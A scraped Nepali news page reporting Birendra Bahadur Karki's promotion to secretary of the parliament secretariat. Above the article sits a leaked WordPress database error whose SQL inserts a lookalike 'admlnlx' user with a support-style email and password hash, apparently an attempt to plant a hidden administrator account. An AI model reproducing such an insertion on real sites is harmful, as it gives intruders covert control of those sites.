WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BNUPl7rkgeBHTsvRoCq/bVjzuj.6ae.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 13:23:18', '', 'admlnlx', 'admlnlx')
काठमाडाँ,पुस १३ –
व्यवस्थापिका–संसद् सचिवालयका सहसचिव वीरेन्द्रबहादुर कार्कीको सचिव पदमा बढुवा भएको छ ।
सभामुख, उपसभामुख, महासचिव र सचिव रहनुभएको व्यवस्थापन समितिको हिजोको बैठकले उहाँलाई सचिवमा बढुवा गर्ने निर्णय गरेको हो । सचिव सोमबहादुर थापा उमेर हदका कारण सेवानिवृत्त भएपछि खाली रहेको सचिवमा कार्कीको बढुवा भएको हो ।
संसद्को महिला, बालबालिका, ज्येष्ठ नागरिक तथा समाज कल्याण समितिको सचिवका रुपमा कार्यरत कार्की कार्यव्यवस्था महाशाखाको प्रमुखको जिम्मेवारीमा रहनुभएको थियो ।
२०४७ साल भदौमा संसद् सेवामा प्रवेश गर्नुभएका सचिव कार्कीको पुर्खौली घर भोजपुरको देउरालीमा छ । उहाँले आजै आफ्नो कार्यभार सम्हाल्नुभएको छ । – रासस